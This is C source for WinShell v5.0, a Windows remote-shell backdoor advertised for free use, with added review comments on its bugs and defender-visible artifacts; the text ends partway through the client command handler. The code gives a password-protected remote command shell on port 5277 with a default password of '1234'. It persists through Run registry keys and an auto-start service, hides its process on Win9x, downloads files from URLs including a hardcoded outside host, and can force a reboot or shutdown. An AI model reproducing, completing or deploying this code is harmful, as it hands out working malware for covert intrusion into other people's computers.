📄 winshell.cpp
//-------------------------------------------------------------------------------//
//  WinShell v5.0 Source Code for Visual C++ 6.0                                 //
//                                                                               //
//     -->> Everyone free to use, modify, recompile!!!  Open it for Internet     //
//                                                                               //
//  Author:    Mr.Janker                                                         //
//  HomePage:  http://www.janker.org                                             //
//  Publisher: http://www.hackbase.com                                           //
//  Release:   10/1/2004                                                         //
//  Reference: Netcat                                                            //
//-------------------------------------------------------------------------------//
/*

WinShell v5.0 - A finished telnet server for windows

    WinShell was a telnet server for the Windows platform. The main program was just a 5k
bytes stand-alone executable file and could run stably without any third-party dll. Although
it was so thin, it had many functions, such as custom port, password protection,
multi-user logon, NT Service mode, file download, user-defined message, special
anti-ddos and etc. Details follow:

01. Designed for Windows 9X/ME/NT/2K/XP
02. Just a stand-alone executable file and no setup
03. Support all of the standard telnet client
04. Allow multi-user logon and password authentication
05. Custom port number and other configurable item
06. Run in the background without gui
07. Support service mode in NT system
08. Built-in install and remove
09. Built-in file download
10. Built-in reboot and shutdown
11. Built-in terminate itself remotely
12. Auto download file and execute while starting
13. Special anti-ddos flood attack
14. Support EXE Compress and Protect program

 FAQ:
 1. Could I compile winshell with other compilers?
 Answer: Yes! such as VC++, BCB, lcc32, Dev C++, and etc.
 2. How to make a 5k winshell.exe?
 Answer: Use lcc32 compiler and compress it with FSG exepacker. 
----------------------------------------------------------------------------------*/

#include "stdafx.h"

#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>
#include <winsvc.h>
#include <urlmon.h>

#pragma comment (lib, "Ws2_32.lib")
#pragma comment (lib, "urlmon.lib")

#define MAX_USER     999  // max clients (also the size of handles[] and the count passed to WaitForMultipleObjects)
#define BUF_SOCK     200  // sock buffer
#define KEY_BUFF     255  // input buffer (command line, cmd[])
                          // NOTE(review): TalkWithClient clears its pwd[SVC_LEN] buffer with KEY_BUFF bytes,
                          // which is larger than SVC_LEN (80) and writes past that buffer.

#define REBOOT       0    // Reboot   (Boot() flag)
#define SHUTDOWN     1    // Shutdown (Boot() flag)
 
#define DEF_PORT     5277 // listening port (default TCP port; a network-visible artifact of this server)

#define REG_LEN      16   // registry key length (also sizes the password and service-name fields)
#define SVC_LEN      80   // nt service name length (display name, description, prompt, URL and file-name fields)

// define winapi to use from dll
typedef DWORD (WINAPI pREGISTERSERVICEPROCESS) (DWORD,DWORD);
typedef LONG  (WINAPI *PROCNTQSIP)(HANDLE,UINT,PVOID,ULONG,PULONG);
typedef BOOL  (WINAPI *ENUMPROCESSMODULES) (HANDLE hProcess, HMODULE * lphModule, DWORD cb, LPDWORD lpcbNeeded);
typedef DWORD (WINAPI *GETMODULEBASENAME) (HANDLE hProcess, HMODULE hModule, LPTSTR lpBaseName, DWORD nSize);

// pipe session structure
//
// Per-client state for a command-shell session: the pipe ends used to talk
// to the spawned shell, the shell process, the client socket, and the two
// pump threads. Nothing in this part of the file instantiates it; it is used
// by the StartShell/Session*ThreadFn routines declared below and defined
// outside this view.
struct SESSION_DATA {
    HANDLE  ReadPipeHandle;         // pipe handle used for reading (presumably shell output — confirm in StartShell)
    HANDLE  WritePipeHandle;        // pipe handle used for writing (presumably shell input — confirm in StartShell)
    HANDLE  ProcessHandle;          // the spawned shell process
    SOCKET  ClientSocket;           // the connected telnet client
    HANDLE  ReadShellThreadHandle;  // thread running SessionReadShellThreadFn
    HANDLE  WriteShellThreadHandle; // thread running SessionWriteShellThreadFn
};

// winshell configuration
//
// Runtime settings; a single global instance (wscfg) is initialized with the
// defaults that follow. The fixed-size char fields are used directly as C
// strings by Install/Uninstall, the service dispatch table and the client
// password check.
struct WSCFG {
    int  ws_port;             // listening port
    char ws_passstr[REG_LEN]; // password string (compared with strcmp against the client's input)
    int  ws_autoins;          // autoinstall flag, 1=yes 0=no
    char ws_regname[REG_LEN]; // registry value name written under HKLM\...\CurrentVersion\Run on Win9x
    char ws_svcname[REG_LEN]; // ntservice name (also the DispatchTable entry name)
    char ws_svcdisp[SVC_LEN]; // ntservice display name
    char ws_svcdesc[SVC_LEN]; // ntservice description, written as the service's "Description" value
    char ws_passmsg[SVC_LEN]; // password prompt message sent to the client before the password read
	int  ws_downexe;          // downexec flag, 1=yes 0=no
	char ws_fileurl[SVC_LEN]; // downfile url, "http://xxx/file.exe"
	char ws_filenam[SVC_LEN]; // downsave filename

};

// default winshell configuration
//
// Positional initializer matching the field order of struct WSCFG.
// NOTE(review): the password, port, registry value name, service name and
// display name below are fixed in the binary; these defaults are what a
// defender can look for (a listener on 5277, a service/autorun entry named
// "winshell") and a fixed password of "1234" means anyone reaching the port
// can authenticate unless it is changed.
struct WSCFG wscfg={DEF_PORT,                               // ws_port
				    "1234",                                 // ws_passstr
				    1,                                      // ws_autoins
				    "winshell",                             // ws_regname
				    "winshell",                             // ws_svcname
                    "WinShell Service",                     // ws_svcdisp
				    "Provide Windows CmdShell Service",     // ws_svcdesc
				    "Password: ",                           // ws_passmsg
					1,                                      // ws_downexe
					"http://www.janker.org/winshell.exe",   // ws_fileurl
					"winshell.exe"                          // ws_filenam
				   };

// message define area
//
// Fixed strings written to the client socket. Line ends are "\n\r" (LF CR),
// the reverse of the telnet CR LF convention. The banner msg_ws_copyright and
// the "CMD>" prompt are sent to every client immediately after the password
// check, so they are a usable on-the-wire signature for this server.
char *msg_ws_copyright="\n\rWinShell v5.0 (C)2002 janker.org\n\r";
char *msg_ws_prompt="\n\r? for help\n\rCMD>";
char *msg_ws_cmd="\n\ri Install\n\rr Remove\n\rp Path\n\rb reBoot\n\rd shutDown\n\rs Shell\n\rx eXit\n\rq Quit\n\r\n\rDownload:\n\rCMD>http://.../srv.exe\n\r";   // help text ('?')
char *msg_ws_ext="\n\rExit.";
char *msg_ws_end="\n\rQuit.";
char *msg_ws_boot="\n\rReboot...";
char *msg_ws_poff="\n\rShutdown...";
char *msg_ws_down="\n\rSave to ";   // followed by the destination path written by DownloadFile

char *msg_ws_err="\n\rErr!";        // generic failure reply for i/r/download commands
char *msg_ws_ok="\n\rOK!";          // generic success reply

// process-wide state
char ExeFile[MAX_PATH];  // path Install() registers for autostart; filled in outside this part of the file
int nUser = 0;           // live client count: incremented in WinShell (accept loop), decremented in CloseIt on the
                         // client threads, with no synchronization — NOTE(review): racy, and it also indexes handles[]
HANDLE handles[MAX_USER]; // one thread handle per accepted client, slot chosen by nUser at accept time
int OsIsNt;              // 1 on NT-based Windows, 0 on 9x/ME; presumably set from GetOsVer() outside this view

// service status shared with NTServiceMain/NTServiceHandler (defined outside this view)
SERVICE_STATUS          serviceStatus;
SERVICE_STATUS_HANDLE   hServiceStatusHandle;

// declare routine
int Install(void);
int Uninstall(void);
int DownloadFile(char *sURL, SOCKET wsh);
int Boot(int flag);
void HideProc(void);
int GetOsVer(void);
int WinShell(SOCKET wsl);
void TalkWithClient(void *cs);
int CmdShell(SOCKET sock);
int StartFromService(void);
int StartWinShell(LPSTR lpCmdLine);
static HANDLE StartShell(HANDLE StdinPipeHandle,HANDLE StdoutPipeHandle);
static VOID SessionReadShellThreadFn(LPVOID Parameter);
static VOID SessionWriteShellThreadFn(LPVOID Parameter);

VOID WINAPI NTServiceMain( DWORD dwArgc, LPTSTR *lpszArgv );
VOID WINAPI NTServiceHandler( DWORD fdwControl );

// configuration data and tables
//
// Service table for StartServiceCtrlDispatcher: a single service whose name
// is the configured wscfg.ws_svcname, entered through NTServiceMain (defined
// outside this view). The terminating {NULL, NULL} entry is required by the
// dispatcher.
SERVICE_TABLE_ENTRY DispatchTable[] =
{
	{wscfg.ws_svcname, NTServiceMain},
	{NULL, NULL}
};

// install self
//
// Registers the path held in ExeFile for automatic start.
//   Win9x: writes a REG_SZ value named wscfg.ws_regname under both
//          HKLM\Software\Microsoft\Windows\CurrentVersion\Run and
//          ...\CurrentVersion\RunServices.
//   NT:    creates an auto-start, interactive, own-process service named
//          wscfg.ws_svcname whose image is ExeFile, then writes its
//          "Description" value under HKLM\SYSTEM\CurrentControlSet\Services\<svcname>.
// These autorun values and the new auto-start service are the persistence
// artifacts a defender would look for.
// Returns 0 on success, 1 on any failure.
// NOTE(review): cbData is lstrlen(...), which omits the terminating NUL that
// REG_SZ data should include. On NT the function returns 1 when the
// Description write fails even though the service has already been created,
// so "failure" does not mean "nothing was installed".
int Install(void)
{
    char svExeFile[MAX_PATH];
    HKEY key;
    strcpy(svExeFile,ExeFile);

	// if win9x, install as service application
	if(!OsIsNt) {
		if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&key)==ERROR_SUCCESS) {
			RegSetValueEx(key,wscfg.ws_regname,0,REG_SZ,(BYTE *)svExeFile,lstrlen(svExeFile));
			RegCloseKey(key);
			// second copy under RunServices; success is reported only if both writes happened
			if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",&key)==ERROR_SUCCESS) {
				RegSetValueEx(key,wscfg.ws_regname,0,REG_SZ,(BYTE *)svExeFile,lstrlen(svExeFile));
				RegCloseKey(key);
				return 0;
	    	}
    	}
	}
	else {

		// if nt, install as ntservice
		SC_HANDLE schSCManager = OpenSCManager( NULL, NULL, SC_MANAGER_CREATE_SERVICE);
		if (schSCManager!=0)
		{
			SC_HANDLE schService = CreateService
			(
				schSCManager,
				wscfg.ws_svcname,
				wscfg.ws_svcdisp,
				SERVICE_ALL_ACCESS,
				SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS ,
				SERVICE_AUTO_START,
				SERVICE_ERROR_NORMAL,
				svExeFile,
				NULL,
				NULL,
				NULL,
				NULL,
				NULL
			);
			if (schService!=0)
			{
				CloseServiceHandle(schService);
				CloseServiceHandle(schSCManager);
				// svExeFile is reused here as the registry path of the new service key
				strcpy(svExeFile,"SYSTEM\\CurrentControlSet\\Services\\");
				strcat(svExeFile,wscfg.ws_svcname);
				if(RegOpenKey(HKEY_LOCAL_MACHINE,svExeFile,&key)==ERROR_SUCCESS) {
					RegSetValueEx(key,"Description",0,REG_SZ,(BYTE *)wscfg.ws_svcdesc,lstrlen(wscfg.ws_svcdesc));
					RegCloseKey(key);
					return 0;
    			}
			}
			CloseServiceHandle(schSCManager);
		}
	}

	return 1;
}

// uninstall self
//
// Reverses Install(): on Win9x deletes the wscfg.ws_regname value from both
// the Run and RunServices keys; on NT opens and deletes the service named
// wscfg.ws_svcname (the executable itself is not removed).
// Returns 0 on success, 1 on any failure.
// NOTE(review): on Win9x the Run value is deleted before the RunServices key
// is opened, so a failure return can still leave the first value removed.
// RegDeleteValue results are not checked.
int Uninstall(void)
{
    HKEY key;

	if(!OsIsNt) {
		if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&key)==ERROR_SUCCESS) {
			RegDeleteValue(key,wscfg.ws_regname);
			RegCloseKey(key);
			if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",&key)==ERROR_SUCCESS) {
				RegDeleteValue(key,wscfg.ws_regname);
				RegCloseKey(key);
				return 0;
			}
		}
	}
	else {

		// nt: mark the service for deletion through the SCM
		SC_HANDLE schSCManager = OpenSCManager( NULL, NULL, SC_MANAGER_ALL_ACCESS);
		if (schSCManager!=0)
		{
			SC_HANDLE schService = OpenService( schSCManager, wscfg.ws_svcname, SERVICE_ALL_ACCESS);
			if (schService!=0)
			{
				if(DeleteService(schService)!=0) {
					CloseServiceHandle(schService);
					CloseServiceHandle(schSCManager);
					return 0;
				}
				CloseServiceHandle(schService);
			}
			CloseServiceHandle(schSCManager);
		}
	}

	return 1;
}

// download file from the appointed url
//
// Fetches sURL with URLDownloadToFile into the current directory, naming the
// file after the last '/'-separated component of the URL. Before downloading
// it echoes the destination path followed by "..." to the client socket wsh.
// Returns 0 when URLDownloadToFile reports S_OK, 1 otherwise.
// NOTE(review): `file` is assigned only inside the strtok loop, so a URL
// without any '/' would leave it uninitialized (the caller's "http://"
// check makes that unreachable today, but the function does not guard it).
// strcpy/strcat into the MAX_PATH buffers are unbounded, and strtok keeps
// static state while this runs on a per-client thread.
int DownloadFile(char *sURL, SOCKET wsh)
{
    HRESULT hr;
	char seps[]= "/";
	char *token;
	char *file;
	char myURL[MAX_PATH];
	char myFILE[MAX_PATH];

	// walk the URL's '/'-separated parts; the last token is the file name
	strcpy(myURL,sURL);
    token=strtok(myURL,seps);
  	while(token!=NULL)
    {
        file=token;
	    token=strtok(NULL,seps);
    }

	// destination = <current directory>\<file name>, reported to the client
	GetCurrentDirectory(MAX_PATH,myFILE);
	strcat(myFILE, "\\");
	strcat(myFILE, file);
    send(wsh,myFILE,strlen(myFILE),0);
	send(wsh,"...",3,0);
	hr = URLDownloadToFile(0, sURL, myFILE, 0, 0);
    if(hr==S_OK)
		return 0;
	else
		return 1;

}

// boot routine
//
// Reboots the machine when flag==REBOOT, otherwise powers off / shuts it
// down, always with EWX_FORCE. On NT the SE_SHUTDOWN_NAME privilege is
// enabled on the current process token first; on Win9x ExitWindowsEx is
// called directly. Returns 0 if ExitWindowsEx succeeded, 1 otherwise.
// NOTE(review): the OpenProcessToken / AdjustTokenPrivileges results are not
// checked and hToken is never closed. The NT branch uses EWX_POWEROFF while
// the 9x branch uses EWX_SHUTDOWN; the `+` used on the 9x flags is
// equivalent to `|` because the EWX_* values are distinct bits.
int Boot(int flag)
{
    HANDLE hToken;
    TOKEN_PRIVILEGES tkp;

    if(OsIsNt) {
        // nt requires the shutdown privilege to be enabled on the token
	    OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);
        LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
        tkp.PrivilegeCount = 1;
        tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0);
		if(flag==REBOOT) {
			if(ExitWindowsEx(EWX_REBOOT | EWX_FORCE, 0))
				return 0;
		}
		else {
			if(ExitWindowsEx(EWX_POWEROFF | EWX_FORCE, 0))
				return 0;
		}
    }
    else {
		if(flag==REBOOT) {
			if(ExitWindowsEx(EWX_REBOOT + EWX_FORCE,0))
				return 0;
		}
		else {
			if(ExitWindowsEx(EWX_SHUTDOWN + EWX_FORCE,0))
				return 0;
		}
	}

	return 1;
}

// hide process in win9x
//
// Resolves Kernel32!RegisterServiceProcess at run time (an export that
// exists only on Win9x/ME) and registers the current process as a "service
// process", which on those systems removes it from the Ctrl+Alt+Del task
// list. Silently does nothing if Kernel32 cannot be loaded.
// NOTE(review): the GetProcAddress result is dereferenced without a NULL
// check, so calling this on NT, where the export does not exist, would fault.
void HideProc(void)
{

    HINSTANCE hKernel=LoadLibrary("Kernel32.dll");
    if ( hKernel != NULL )
    {
		pREGISTERSERVICEPROCESS *pRegisterServiceProcess=(pREGISTERSERVICEPROCESS *)GetProcAddress(hKernel,"RegisterServiceProcess");
        ( *pRegisterServiceProcess)(GetCurrentProcessId(),1);   // 1 = register (hide), 0 would unregister
        FreeLibrary(hKernel);
    }

	return;
}

// get OS version
//
// Returns 1 when GetVersionEx reports an NT-based platform
// (VER_PLATFORM_WIN32_NT), 0 otherwise (Win9x/ME).
int GetOsVer(void)
{
    OSVERSIONINFO osvi;
    osvi.dwOSVersionInfoSize = sizeof osvi;
    GetVersionEx(&osvi);
    return osvi.dwPlatformId == VER_PLATFORM_WIN32_NT ? 1 : 0;
}

// handle client routine
//
// Accept loop for the listening socket wsl. Each accepted client socket is
// handed to a new TalkWithClient thread (the SOCKET value is passed through
// the thread's void* parameter) and the thread handle is stored in
// handles[nUser]. Returns 1 if accept() fails; returns 0 once the loop stops
// at the MAX_USER limit.
// NOTE(review): nUser is also decremented by CloseIt on the client threads
// with no synchronization, so slots in handles[] can be skipped or reused.
// WaitForMultipleObjects is given MAX_USER (999) handles, most of them NULL;
// the Win32 limit is MAXIMUM_WAIT_OBJECTS (64), so the wait is expected to
// fail immediately rather than block — confirm.
int WinShell(SOCKET wsl)
{
    SOCKET wsh;
    struct sockaddr_in client;
    DWORD myID;

    while(nUser<MAX_USER)
	{
	    int nSize=sizeof(client);
        wsh=accept(wsl,(struct sockaddr *)&client,&nSize);
	    if(wsh==INVALID_SOCKET) return 1;

		// one thread per client; on thread-creation failure the client is dropped
		handles[nUser]=CreateThread(0,1000,(LPTHREAD_START_ROUTINE) TalkWithClient,(VOID *) wsh, 0, &myID);
		if(handles[nUser]==0)
			closesocket(wsh);
		else
			nUser++;
    }
    WaitForMultipleObjects(MAX_USER,handles,TRUE,INFINITE);

    return 0;
}

// close socket
//
// Ends the calling client thread: closes wsh, decrements the shared client
// count nUser (no synchronization), then calls ExitThread, so control never
// returns to the caller.
void CloseIt(SOCKET wsh)
{
	closesocket(wsh);
	nUser = nUser - 1;
	ExitThread(0);
}

// handle the client request
void TalkWithClient(void *cs)
{

    SOCKET wsh=(SOCKET)cs;
    char pwd[SVC_LEN];
    char cmd[KEY_BUFF];
	char chr[1];
	int i,j;

    while (nUser < MAX_USER) {

		if(wscfg.ws_passstr) {
			if(strlen(wscfg.ws_passmsg)) send(wsh,wscfg.ws_passmsg,strlen(wscfg.ws_passmsg),0);
			ZeroMemory(pwd,KEY_BUFF);
       		i=0;
			while(i<SVC_LEN) {

				// set timeout
				fd_set FdRead;
				struct timeval TimeOut;
				FD_ZERO(&FdRead);
				FD_SET(wsh,&FdRead);
				TimeOut.tv_sec=6;
				TimeOut.tv_usec=0;
				int Er=select(wsh+1, &FdRead, NULL, NULL, &TimeOut);
				if((Er==SOCKET_ERROR) || (Er==0)) CloseIt(wsh);

				if(recv(wsh,chr,1,0)==SOCKET_ERROR) CloseIt(wsh);
				pwd[i]=chr[0];
				if(chr[0]==0xd || chr[0]==0xa) {
					pwd[i]=0;
					break;
				}
				i++;
		    }

			// if invalid user, close the socket
           	if(strcmp(pwd,wscfg.ws_passstr)) CloseIt(wsh);
		}

		send(wsh,msg_ws_copyright,strlen(msg_ws_copyright),0);
	    send(wsh,msg_ws_prompt,strlen(msg_ws_prompt),0);

		while(1) {

			ZeroMemory(cmd,KEY_BUFF);

       		// auto support standard telnet client			
			j=0;
			while(j<KEY_BUFF) {
				if(recv(wsh,chr,1,0)==SOCKET_ERROR) CloseIt(wsh);
				cmd[j]=chr[0];
				if(chr[0]==0xa || chr[0]==0xd) {
					cmd[j]=0;
					break;
				}
				j++;
		    }

			// download file
			if(strstr(cmd,"http://")) {
				send(wsh,msg_ws_down,strlen(msg_ws_down),0);
				if(DownloadFile(cmd,wsh))
					send(wsh,msg_ws_err,strlen(msg_ws_err),0);
				else
					send(wsh,msg_ws_ok,strlen(msg_ws_ok),0);
			}
			else {

		    	switch(cmd[0]) {
					
					// help
					case '?': {
  			    		send(wsh,msg_ws_cmd,strlen(msg_ws_cmd),0);
						break;
					}
					// install
					case 'i': {
						if(Install())
							send(wsh,msg_ws_err,strlen(msg_ws_err),0);
						else
							send(wsh,msg_ws_ok,strlen(msg_ws_ok),0);
						break;
		    		}
					// uninstall
					case 'r': {
						if(Uninstall())
							send(wsh,msg_ws_err,strlen(msg_ws_err),0);
						else
							send(wsh,msg_ws_ok,strlen(msg_ws_ok),0);
						break;
